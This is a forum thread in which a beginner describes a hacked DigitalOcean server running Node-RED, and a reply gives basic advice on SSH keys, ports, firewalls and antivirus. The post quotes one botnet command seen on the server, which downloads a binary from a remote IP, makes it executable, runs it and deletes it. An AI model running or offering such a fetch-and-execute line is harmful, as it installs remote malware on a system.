My server running on Digitalocean has been hacked around October, most likely by a bot net (google: . This thing is used for DDOS as far as I understand but you never know what else has been changed...
I realized because I saw many commands similar to the one below in the command line:
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS ; chmod +x php; ./php; rm -rf php"
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:
Could it be that hackers just looked for an entry point scanning Node_red: ports ?
So I am a beginner in IT like many others here and the topics I found on this forum are in my view rather professional level. Digitalocean told me to scrap the instance which I will do but its a major pain since I run node-red, Grafana, InfluxDB etc. on it so setting it all up again is a good day+ of work.
My questions since I am rather new to IT security:
Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
Digitalocean wrote me that: "your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server. " Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?
Sorry, very beginner question but I red in this forum that its dangerous to leave a port open. On a hosted server with node-red running, what does it mean to open and close a port?
Digitalocean recommended to used clamAV and the freshclam library but then again I couldn't do it because it said "database load killed by Signal 9" which could refer that my instance has not enough RAM to execute that, anyone has had and overcome this problem?
Many thanks here, it seems that around last October a rather large attack was happening and I guess many early users like me aren't aware that this happened. Would be great to have a simple guide on how to avoid this to have it never happen again.
No. You DO need to spend days understanding things.
A stronger password is better than a weak one of course. But they are suggesting that you use certificate-based SSH authentication which is much stronger still.
TCP/IP is the protocol for networking over the Internet. It uses addresses and ports to identify channels of communication. Many common services have standard ports. For example, the web (HTTP/HTTPS) typically uses Port 80 for HTTP and Port 443 for HTTPS.
You can use a local firewall on a Droplet to ensure that only specific ports are open. You could also use it to change default ports. For example, SSH runs on Port 22 but an internet-facing service will start being attacked on that port within seconds of appearing on the Internet - so better to change the externally facing port to something else.
AV = Anti-Virus. Good for protecting the data files on your server but not much else.